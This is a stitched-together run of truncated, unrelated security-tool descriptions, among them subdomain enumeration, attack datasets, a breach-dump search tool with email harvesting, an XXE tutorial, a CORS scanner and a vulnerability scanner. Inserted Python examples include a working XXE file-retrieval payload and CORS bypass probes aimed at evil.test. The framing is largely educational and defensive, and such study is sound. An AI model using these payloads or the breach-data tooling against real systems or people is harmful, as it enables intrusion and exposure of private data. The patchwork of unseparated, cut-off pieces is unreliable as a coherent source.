Subdomain3 is a new-generation subdomain enumeration tool. It helps penetration testers discover more information in less time than other tools: subdomains, IP addresses, CDN usage, and so on. Please enjoy it.

Features

- More quick: three speed patterns. Users can edit the configuration file (lib/config.py) to speed things up.
- CDN support: determines automatically whether a subdomain is served through a CDN, even when the CNAME suffix is not in the built-in dictionary of CDN servers.
- RFC CIDR: sorts the resolved IPs and reports the CIDR blocks (for example 1.1.1.1/24) that are not behind a CDN.
- Multi-level subdomain support: discovers deeper subdomains, for example admin.test.xx.com.
- Big dict support: wordlists with millions of entries.
- Less resource consumption: 1 CPU / 1 GB memory / 1 Mbps bandwidth.
- More intelligent: discovers the fastest nameserver; dynamically adjusts the dictionary by importing subdomains from other sources; prevents DNS cache pollution.

Getting started

    git clone https://github.com/yanxiu0614/subdomain3.git
    pip install -r requirement.txt
    python2/3 brutedns.py -d targetdomain -s high -l 5

Usage

Short Form | Long Form | Description
---|---|---
-d | --domain | target domain, for example: baidu.com
-s | --speed | speed, three patterns: fast, medium, low
-l | --level | example: 2: w.baidu.com; 3: w.w.baidu.com
-f | --file | the list of target domains
-c | --cname | n or y, collect CNAMEs
-ns | --default_dns | n or y
-f1 | --sub_file | …

The Mordor project provides pre-recorded security events generated by simulated adversarial techniques in the form of JavaScript Object Notation (JSON) files for easy consumption. The pre-recorded data is categorized by platforms, adversary groups, tactics and techniques defined by the MITRE ATT&CK Framework. The pre-recorded data represents not only specific known malicious events but also the context/events that occur around them. This is done on purpose so that you can test creative correlations across diverse data sources, enhancing your detection strategy and potentially reducing the number of false positives in your own environment.

The name Mordor comes from the awesome book/film series "The Lord of the Rings", where it was the place the evil forces of Sauron lived. This repository is where data generated by known "malicious" adversarial activity lives, hence the name of the project.

Goals

- Provide free portable malicious datasets to expedite the development of data analytics.
- Facilitate adversarial techniques simulation and output consumption.
- Allow security analysts to test their skills with real known-bad data.
- Improve the testing of hunting use cases and data analytics in an easier and more affordable way.
- Enable data scientists to have semi-labeled data for initial research.
- Map threat hunter playbooks to their respective pre-recorded data for validation purposes.
- Contribute to the ATT&CK framework Data Sources section of…

Attack Monitor is a Python application written to enhance the security monitoring capabilities of Windows 7/2008 (and all later versions) workstations/servers and to automate dynamic analysis of malware.

Current modes (mutually exclusive):

- Endpoint detection (ED)
- Malware analysis (on a dedicated virtual machine)

Based on events from:

- Windows event logs
- Sysmon
- Watchdog (filesystem monitoring Python library)
- TShark (malware analysis mode only)

Current version: 0.9.0 (Alpha)

Contact: [email protected]

Supported OS

- Windows 7, 8, 10 (x86 or x64)
- Windows 2008, 2012, 2016 (x86 or x64)

Pre-requirements

- PowerShell 5
- Sysmon (downloaded, configured and installed by installer.py)
- Python 3.6 (64-bit); should work on any Python 3.x
- TShark (malware analysis only)
- Various Python 3 libraries (requirements.txt)
- StoneEngine library (included, published for the first time, a high-level Windows event log interface; alpha state)

Supported system events (some of them only in malware analysis mode)

- Filesystem changes
- Permitted network connections
- PowerShell activity (detailed only with PowerShell 5)
- Process creation
- SMB activity
- Scheduled tasks
- Local account manipulation
- Successful/failed logins
- Driver loads
- Raw disk access
- Registry monitoring
- Pipe events
- Services
- Audit log cleared
- WMI monitoring of queries + WMI persistence
- DNS request capture (via TShark)

Installation - Endpoint Detection Mode …

Your private data is being traded and sold all over the internet as we speak. Tons of leaks come out on a daily basis, which can make you feel powerless. The majority of user passwords and other sensitive information have been posted somewhere on the internet/darknet for any prying eyes to see, whether you like it or not. To take more control of what personal info is out there you can use Haveibeenpwned to narrow down which breaches your information has been exposed in. This is a great start, but what if you want to know exactly what information of yours other people have access to? BaseQuery is an all-in-one program that makes importing and searching through thousands of data breaches easy.

Features included:

- A 4x nested storage structure
- Average import speeds of 12,000+ entries per second (Intel Core i7-7700HQ CPU @ 2.8GHz)
- Instantaneous querying system
- Facebook's zstd lossless compression algorithm to reduce the size of the data (on average it reduces the data to less than 10% of the original size)
- Calculates the time all your files will take to import based on your specific hardware
- Duplicate data protection
- Outputs all of your findings in a standard format
- Email harvesting built in

Installing

To install BaseQuery type the following commands:

    git clone https://github.com/g666gle/BaseQuery.git
    sudo chmod 755 -R BaseQuery/
    cd BaseQuery
    ./dependencies.sh
    ./run.sh

Getting started

Place any databases that you have into the "PutYourDataBasesHere"…

Graphs help to spot anomalies and patterns in large datasets. This script takes netstat information from multiple hosts and formats it so that it can be imported into Neo4j. Neo4j can then be queried to find connections to certain hosts or from certain hosts, to find out which protocols are in use, and much more.

Example files

There are already some files in the example directory so that you can test the tool. You can also find example queries there that give a basic idea of what the search makes possible.

Status

Currently the tool is tested with the netstat output of Windows systems produced by the command `netstat -an`.

Setup

- Install docker and docker-compose:
  https://docs.docker.com/install/linux/docker-ce/centos/
  https://docs.docker.com/compose/install/
- Extract the files:
  git clone https://github.com/trinitor/netstat2neo4j.git /opt/netstat2neo4j/
- Start the container:
  cd /opt/netstat2neo4j/docker
  docker-compose up -d
- Test the logon at https://ip:7473 with user: neo4j, pass: neo4j. These are Neo4j's default credentials; change the password before anyone else can reach the instance.
- Upload netstat files: copy all netstat output files (*.txt) into /opt/netstat2neo4j/script/import/
- Create the Cypher statements for Neo4j:
  cd /opt/netstat2neo4j/script/
  bash csv2neo4j.sh
  The needed Cypher statements can be found in create_database.txt
- Create the database: browse to https://localhost:7473, copy the content of create_database.txt and paste it into the command bar of the Neo4j interface.

Example query

MATCH…
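The conversion step above (netstat output to Cypher statements) as an added example. This is my own Python version, not the project's csv2neo4j.sh: the graph schema (Host nodes, CONNECTS_TO and LISTENS_ON relationships), the hostname WKS01 and the sample netstat dump are all constructed for this example.

```python
# Constructed sample of Windows "netstat -an" output; not one of the project's example files.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    10.0.0.5:49731         10.0.0.20:445          ESTABLISHED
  TCP    10.0.0.5:49802         203.0.113.10:443       ESTABLISHED
  TCP    [::]:445               [::]:0                 LISTENING
  UDP    0.0.0.0:123            *:*
"""


def split_endpoint(endpoint):
    """Split 'ip:port' or '[ipv6]:port' into (ip, port); port is None for '*'."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), (int(port) if port.isdigit() else None)


def parse_netstat(text, hostname):
    """Turn one host's netstat -an dump into row dicts; title, header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("TCP", "UDP"):
            continue
        local_ip, local_port = split_endpoint(parts[1])
        foreign_ip, foreign_port = split_endpoint(parts[2])
        rows.append({
            "host": hostname, "proto": parts[0],
            "local_ip": local_ip, "local_port": local_port,
            "foreign_ip": foreign_ip, "foreign_port": foreign_port,
            "state": parts[3] if len(parts) > 3 else "",   # UDP rows carry no state column
        })
    return rows


def cypher_str(value):
    """Quote a string as a Cypher literal; the hostname is the only text here that could contain quotes."""
    return '"' + str(value).replace("\\", "\\\\").replace('"', '\\"') + '"'


def to_cypher(rows):
    """One MERGE statement per row. Schema (my choice, not the project's):
    (:Host {name}) -[:LISTENS_ON]-> (:Port {proto, number})
    (:Host {name}) -[:CONNECTS_TO {proto, src_port, dst_port, state}]-> (:Host {name: remote ip})
    MERGE instead of CREATE keeps one node per host/port when many dumps are loaded."""
    statements = []
    for r in rows:
        host = cypher_str(r["host"])
        if r["state"] == "LISTENING" or r["foreign_ip"] == "*":
            statements.append(
                f"MERGE (h:Host {{name: {host}}}) "
                f"MERGE (p:Port {{proto: {cypher_str(r['proto'])}, number: {r['local_port']}}}) "
                f"MERGE (h)-[:LISTENS_ON]->(p)")
        else:
            statements.append(
                f"MERGE (h:Host {{name: {host}}}) "
                f"MERGE (r:Host {{name: {cypher_str(r['foreign_ip'])}}}) "
                f"MERGE (h)-[:CONNECTS_TO {{proto: {cypher_str(r['proto'])}, "
                f"src_port: {r['local_port']}, dst_port: {r['foreign_port']}, "
                f"state: {cypher_str(r['state'])}}}]->(r)")
    return statements


if __name__ == "__main__":
    # Each statement can be pasted into the Neo4j browser or piped to cypher-shell.
    for stmt in to_cypher(parse_netstat(SAMPLE_NETSTAT, "WKS01")):
        print(stmt + ";")
```

Run it once per host with that host's name, concatenate the output, and paste it where create_database.txt would go. Keying the local node by hostname and the remote node by IP means a later dump from 10.0.0.20 itself will create a second node for that machine unless you also map its hostname to its addresses, which is worth doing before running queries that count peers.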

"Opening Pandora's Box through ATFuzzer: Dynamic Analysis of AT Interface for Android Smartphones" was accepted at the 35th Annual Computer Security Applications Conference (ACSAC) 2019. https://relentless-warrior.github.io/wp-content/uploads/2019/11/atfuzz.pdf

Abstract

This paper focuses on checking the correctness and robustness of the AT command interface exposed by the cellular baseband processor through Bluetooth and USB. A device's application processor uses this interface for issuing high-level commands (or, AT commands) to the baseband processor for performing cellular network operations (e.g., placing a phone call). Vulnerabilities in this interface can be leveraged by malicious Bluetooth peripherals to launch various attacks including DoS and privacy attacks. To identify such vulnerabilities, we propose ATFuzzer, which uses a grammar-guided evolutionary fuzzing approach that mutates production rules of the AT command grammar instead of concrete AT commands. Empirical evaluation with ATFuzzer on 8 Android smartphones from 5 vendors revealed 4 invalid AT command grammars over Bluetooth and 13 over USB, with implications ranging from DoS and downgrade of the cellular protocol version to severe privacy leaks.

Run ATFuzzer

Requirements

Python 2.7.15. Please do not use Python 3 because there are library incompatibilities. The required libraries are specified in the file requirements.txt and can be installed by executing the command: pip install -r…
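To make the grammar-mutation idea in the abstract concrete, here is an added example written for this page; it is not ATFuzzer's code (which targets Python 2) and runs on Python 3. The three-command AT grammar is a toy I made up, the mutation operators are my choice, and the evolutionary fitness loop against a real baseband is left out because nothing here talks to a device. What it shows is the distinguishing step: the mutation edits one production rule, and concrete commands are only derived afterwards.

```python
import random
import re

# A toy AT-command grammar, constructed for this example (ATFuzzer's real grammar is larger).
# Nonterminals are written <like-this>; each maps to a list of productions (lists of symbols).
BASE_GRAMMAR = {
    "<command>": [["AT", "<body>", "\r"]],
    "<body>": [
        ["+CMGS=", "<number>"],                   # send an SMS
        ["+CCFC=", "<digit>", ",", "<digit>"],    # call forwarding: reason,mode
        ["+CFUN=", "<digit>"],                    # phone functionality level
    ],
    "<number>": [['"', "<digit>", "<digit>", "<digit>", '"']],
    "<digit>": [[d] for d in "0123456789"],
}

# What a correct parser should accept: the language of BASE_GRAMMAR, written as a regex.
WELL_FORMED = re.compile(r'AT(\+CMGS="\d{3}"|\+CCFC=\d,\d|\+CFUN=\d)\r')


def is_well_formed(command):
    return WELL_FORMED.fullmatch(command) is not None


def generate(grammar, rng, symbol="<command>", depth=0):
    """Derive one concrete command by expanding nonterminals with random productions."""
    if symbol not in grammar:
        return symbol                      # terminal
    if depth > 20:
        return ""                          # mutated grammars may contain cycles; cut them off
    production = rng.choice(grammar[symbol])
    return "".join(generate(grammar, rng, s, depth + 1) for s in production)


def mutate_rule(grammar, rng):
    """Return (new_grammar, description). The mutation acts on ONE production rule,
    not on a concrete command string: swap two symbols, drop one, duplicate one,
    or cross in a symbol taken from another rule."""
    new = {nt: [list(p) for p in prods] for nt, prods in grammar.items()}
    nt = rng.choice(sorted(new))
    idx = rng.randrange(len(new[nt]))
    prod = new[nt][idx]
    op = rng.choice(["swap", "drop", "duplicate", "cross"])
    if op == "swap" and len(prod) >= 2:
        i, j = rng.sample(range(len(prod)), 2)
        prod[i], prod[j] = prod[j], prod[i]
    elif op == "drop" and prod:
        del prod[rng.randrange(len(prod))]
    elif op == "duplicate" and prod:
        i = rng.randrange(len(prod))
        prod.insert(i, prod[i])
    elif op == "cross" and prod:
        donor = rng.choice(new[rng.choice(sorted(new))])
        if donor:
            prod[rng.randrange(len(prod))] = rng.choice(donor)
    return new, f"{op} in {nt}[{idx}] -> {prod}"


def campaign(grammar, generations, seed=0):
    """Mutate the base grammar once per generation and derive one command from each mutant.
    Returns (description, command, well_formed) triples. Against a real device the
    interesting inputs are the malformed ones the baseband nevertheless accepts."""
    rng = random.Random(seed)
    results = []
    for _ in range(generations):
        mutant, desc = mutate_rule(grammar, rng)
        cmd = generate(mutant, rng)
        results.append((desc, cmd, is_well_formed(cmd)))
    return results


if __name__ == "__main__":
    for desc, cmd, ok in campaign(BASE_GRAMMAR, 10, seed=1):
        print(f"{'valid  ' if ok else 'INVALID'} {cmd!r:28} <- {desc}")
```

Because one mutation rewrites a rule, every command derived from that mutant shares the same structural defect (a missing terminator, a duplicated parameter, a number where a digit belongs), which is what lets a fuzzer attribute a device's reaction to a grammar change rather than to one lucky string.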

In this section, we'll explain what XML external entity injection is, describe some common examples, explain how to find and exploit various kinds of XXE injection, and summarize how to prevent XXE injection attacks.

What is XML external entity injection?

XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any backend or external systems that the application itself can access. In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other backend infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks.

There are various types of XXE attacks:

XXE attack type | Description
---|---
Exploiting XXE to retrieve files | An external entity is defined containing the contents of a file, and returned in the application's response.
Exploiting XXE to perform SSRF attacks | An external entity is defined based on a URL to a back-end system.
Exploiting blind XXE to exfiltrate data out-of-band | Sensitive data is transmitted from the application server to a system that the attacker controls.
Exploiting blind XXE to retrieve data via error messages | The attacker can trigger a parsing error message containing sensitive data.

XML External…
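The file-retrieval case from the table, as an added example that is not part of the original article: a Python xml.sax parser that leaks a file when external general entities are enabled and returns nothing for the entity when they are disabled. The stockCheck/productId document, the secret file and its contents are constructed for the example; the only thing that differs between the vulnerable and the hardened parse is one parser feature.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects character data, which is where an expanded entity's content ends up."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_product_id(xml_bytes, resolve_external_entities):
    """Parse a stock-check request and return the text inside it.
    resolve_external_entities=True  : vulnerable, SYSTEM entities are fetched (file://, http://).
    resolve_external_entities=False : hardened, &xxe; expands to nothing."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.parts)


def build_payload(target_path):
    """The classic retrieval payload: a SYSTEM entity pointing at a local file,
    referenced from an element whose value the application echoes back."""
    return (
        '<?xml version="1.0"?>'
        f'<!DOCTYPE stockCheck [<!ENTITY xxe SYSTEM "file://{target_path}">]>'
        '<stockCheck><productId>&xxe;</productId></stockCheck>'
    ).encode()


def run_demo():
    """Write a constructed secret, then send the payload to both parser configurations."""
    with tempfile.NamedTemporaryFile("w", suffix=".conf", delete=False) as f:
        f.write("db_password=hunter2")      # constructed secret, stands in for /etc/passwd etc.
        secret_path = f.name
    try:
        payload = build_payload(secret_path)
        leaked = parse_product_id(payload, resolve_external_entities=True)
        blocked = parse_product_id(payload, resolve_external_entities=False)
    finally:
        os.unlink(secret_path)
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = run_demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser returned:  ", repr(blocked))
```

Two caveats a practitioner runs into immediately. First, the entity is parsed as XML, so a target file containing `<` or an unbalanced `&` makes the vulnerable parse fail instead of leaking, which is why the out-of-band and error-based techniques in the table exist. Second, the safe setting above only covers this parser: every XML library in the application (and every library that embeds one, such as SOAP, SVG or Office-document handlers) needs entity resolution disabled independently, and a wrapper like defusedxml is the usual way to make that the default.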

We are incredibly excited to announce our fourth and final release of 2019, Kali Linux 2019.4.

2019.4 includes some exciting new updates:

- A new default desktop environment, Xfce
- New GTK3 theme (for Gnome and Xfce)
- Introduction of "Kali Undercover" mode
- Kali Documentation has a new home and is now Git powered
- Public Packaging: getting your tools into Kali
- Kali NetHunter KeX: full Kali desktop on Android
- BTRFS during setup
- Added PowerShell
- The kernel is upgraded to version 5.3.9
- … Plus the normal bug fixes and updates.

New Desktop Environment and GTK3 Theme

There are a ton of updates to go over for this release, but the most in-your-face item that everyone is going to notice first is the change to the desktop environment and theme. So let's cover that first. An update to the desktop environment has been a long time coming:

- Performance issues: Gnome is a fully-featured desktop environment with a ton of awesome things it can do. But all these features come with overhead, often overhead that is not useful for a distribution like Kali. We wanted to speed things up, and have a desktop environment that does only what it's needed for, and nothing else. Gnome has been overkill for most Kali users, as many just want a window manager that allows you to run multiple terminal windows at once, and a web browser.
- Fractured user experience: We support a range of hardware, from the very high end to the very low. Because of this, traditionally our lower-end…

Corsy is a lightweight program that scans for all known misconfigurations in CORS implementations.

Usage

Using Corsy is pretty simple:

    python corsy.py -u https://example.com

A delay between consecutive requests can be specified with the -d option.

Note: This is a beta version; features such as JSON output and scanning multiple hosts will be added later.

Tests implemented

- Pre-domain bypass
- Post-domain bypass
- Backtick bypass
- Null origin bypass
- Unescaped dot bypass
- Invalid value
- Wild card value
- Origin reflection test
- Third party allowance test
- HTTP allowance test

Support the developer

Liked the project? Donate a few bucks to motivate me to keep writing code for free.

Paypal: https://paypal.me/s0md3v
Credit/Debit Card: https://www.buymeacoffee.com/s0md3v

Download…
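To show what most of the listed tests actually send and how a response is judged, here is an added example; it is my code, not Corsy's. It builds the probe Origin values for a target, classifies the Access-Control-Allow-Origin / Access-Control-Allow-Credentials pair that comes back, and runs the probes against a few origin-validation policies I constructed to mimic common server-side mistakes. The attacker domain evil.test, the policy functions and the verdict strings are all assumptions of this example; the third-party and invalid-value tests are not modelled.

```python
import re
from urllib.parse import urlparse


def probe_origins(target):
    """Origin header values for the bypass classes, built around the target's host.
    (The attacker-controlled domain evil.test is a placeholder.)"""
    u = urlparse(target)
    host, scheme = u.hostname, u.scheme
    return {
        "pre-domain":    f"{scheme}://{host}.evil.test",      # beats startswith(target) checks
        "post-domain":   f"{scheme}://evil{host}",            # beats endswith(target) checks
        "backtick":      f"{scheme}://{host}`.evil.test",     # odd character after the real host
        "null":          "null",                              # sandboxed iframes / data: URLs send this
        "unescaped-dot": f"{scheme}://{host.replace('.', 'x', 1)}",  # regex with an unescaped '.'
        "reflection":    f"{scheme}://evil.test",             # server echoes whatever it gets
        "http":          f"http://{host}",                    # plaintext origin trusted by an https site
    }


def classify(origin_sent, acao, acac):
    """Judge one response from its CORS headers."""
    if acao is None:
        return "not allowed"
    with_creds = (acac or "").strip().lower() == "true"
    if acao == "*":
        # Browsers refuse to attach cookies to a '*' response, so only public data is reachable.
        return "wildcard" + (" with credentials (invalid combination)" if with_creds else "")
    if acao == origin_sent:
        return "origin accepted" + (" with credentials: exploitable" if with_creds else " without credentials")
    return "not allowed"


def scan(policy, target, credentials=True):
    """Run every probe against a validation policy (a function Origin -> ACAO value or None).
    `credentials` models whether the server also sets Access-Control-Allow-Credentials: true."""
    findings = {}
    for name, origin in probe_origins(target).items():
        acao = policy(origin)
        acac = "true" if (acao and credentials) else None
        findings[name] = classify(origin, acao, acac)
    return findings


def exploitable(findings):
    return sorted(name for name, verdict in findings.items() if verdict.endswith("exploitable"))


# Constructed origin-validation policies that mimic real misconfigurations.
def policy_suffix(origin):            # "anything that ends with our domain"
    return origin if origin.endswith("example.com") else None

def policy_prefix(origin):            # "anything that starts with our origin"
    return origin if origin.startswith("https://example.com") else None

def policy_unescaped_regex(origin):   # the '.' was meant literally but matches any character
    return origin if re.fullmatch(r"https://example.com", origin) else None

def policy_allow_null(origin):        # allow-list that includes the literal string 'null'
    return origin if origin in ("https://example.com", "null") else None

def policy_reflect(origin):           # echoes the request's Origin unconditionally
    return origin

def policy_strict(origin):            # exact match against an allow-list: the fix
    return origin if origin in ("https://example.com",) else None


if __name__ == "__main__":
    for policy in (policy_suffix, policy_prefix, policy_unescaped_regex,
                   policy_allow_null, policy_reflect, policy_strict):
        print(f"{policy.__name__:24} exploitable via: {exploitable(scan(policy, 'https://example.com'))}")
```

The credentials flag matters more than any single probe: the same reflecting policy is a full account-data read when Allow-Credentials is true and only exposes unauthenticated content when it is absent, which is the distinction a scanner's verdict has to carry.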

Flan Scan is a lightweight network vulnerability scanner. With Flan Scan you can easily find open ports on your network, identify services and their versions, and get a list of relevant CVEs affecting your network. Flan Scan is a wrapper over Nmap and the vulners script, which turns Nmap into a full-fledged network vulnerability scanner. Flan Scan makes it easy to deploy Nmap locally within a container, push results to the cloud, and deploy the scanner on Kubernetes.

Getting started

- Clone this repository.
- Make sure you have Docker set up: $ docker --version
- Add the list of IP addresses or CIDRs you wish to scan to shared/ips.txt.
- Build the container: $ make build
- Start scanning! $ make start

When the scan finishes you will find a LaTeX report summarizing the scan in shared/reports. You can also see the raw XML output from Nmap in shared/xml_files.

Custom Nmap configuration

By default Flan Scan runs the following Nmap command:

    $ nmap -sV -oX /shared/xml_files -oN - -v1 [email protected] --script=vulners/vulners.nse <ip-address>

The -oX flag writes an XML version of the scan results to the /shared/xml_files directory and the -oN - flag outputs "normal" Nmap results to the console. The -v1 flag increases the verbosity to 1 and the -sV flag runs a service detection scan (in addition to Nmap's default port and SYN scans). --script=vulners/vulners.nse is the script that matches the detected services with relevant CVEs; it works from the CPE that service detection assigns to each port, so keep -sV when customizing the command or the script will have nothing to look up. Nmap…
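An added example (not part of Flan Scan) of consuming the raw XML that the command above writes into shared/xml_files: it flattens the vulners script tables into a CVSS-sorted list and a per-host summary of the kind the report is built from. The sample XML is constructed and its vulnerability identifiers are placeholders; the nested `<table>`/`<elem>` layout under the vulners script is what I have seen the script emit and is treated here as an assumption to check against your own output files.

```python
import xml.etree.ElementTree as ET

# Constructed Nmap XML, trimmed to the parts that matter. Identifiers are placeholders.
SAMPLE_NMAP_XML = """\
<nmaprun scanner="nmap" args="nmap -sV --script=vulners/vulners.nse 10.0.0.5">
  <host>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.4"/>
        <script id="vulners" output="(see tables)">
          <table key="cpe:/a:openbsd:openssh:7.4">
            <table><elem key="id">CVE-0000-0001</elem><elem key="type">cve</elem>
                   <elem key="is_exploit">false</elem><elem key="cvss">7.5</elem></table>
            <table><elem key="id">CVE-0000-0002</elem><elem key="type">cve</elem>
                   <elem key="is_exploit">false</elem><elem key="cvss">5.3</elem></table>
          </table>
        </script>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.29"/>
        <script id="vulners" output="(see tables)">
          <table key="cpe:/a:apache:http_server:2.4.29">
            <table><elem key="id">EXPLOIT-0000</elem><elem key="type">exploitdb</elem>
                   <elem key="is_exploit">true</elem><elem key="cvss">9.8</elem></table>
          </table>
        </script>
      </port>
      <port protocol="tcp" portid="443">
        <state state="open"/>
        <service name="https"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def parse_vulners(xml_text, min_cvss=0.0):
    """Flatten vulners findings into dicts, highest CVSS first. A port without a vulners
    table (443 above: no version, hence no CPE) contributes nothing."""
    findings = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            script = port.find("script[@id='vulners']")
            if script is None:
                continue
            svc = port.find("service")
            service = " ".join(filter(None, [svc.get("product"), svc.get("version")])) if svc is not None else ""
            for cpe_table in script.findall("table"):
                for entry in cpe_table.findall("table"):
                    fields = {e.get("key"): (e.text or "").strip() for e in entry.findall("elem")}
                    cvss = float(fields.get("cvss") or 0.0)
                    if cvss < min_cvss:
                        continue
                    findings.append({
                        "host": addr, "port": int(port.get("portid")), "proto": port.get("protocol"),
                        "service": service, "cpe": cpe_table.get("key"),
                        "id": fields.get("id"), "type": fields.get("type"),
                        "cvss": cvss, "is_exploit": fields.get("is_exploit") == "true",
                    })
    return sorted(findings, key=lambda f: (-f["cvss"], f["host"], f["port"]))


def summarize(findings):
    """Per-host roll-up for a report: number of findings, worst score, exploits available."""
    summary = {}
    for f in findings:
        s = summary.setdefault(f["host"], {"count": 0, "max_cvss": 0.0, "exploits": 0})
        s["count"] += 1
        s["max_cvss"] = max(s["max_cvss"], f["cvss"])
        s["exploits"] += f["is_exploit"]
    return summary


if __name__ == "__main__":
    for f in parse_vulners(SAMPLE_NMAP_XML, min_cvss=7.0):
        print(f"{f['host']}:{f['port']:<5} {f['cvss']:>4} {f['id']:14} {f['service']}")
    print(summarize(parse_vulners(SAMPLE_NMAP_XML)))
```

Point it at each file in shared/xml_files and the is_exploit flag gives you the triage order: a 7.5 with a public exploit usually matters more than a 9.8 without one, and the CPE field tells you whether a match came from a precise version string or a guess worth verifying by hand.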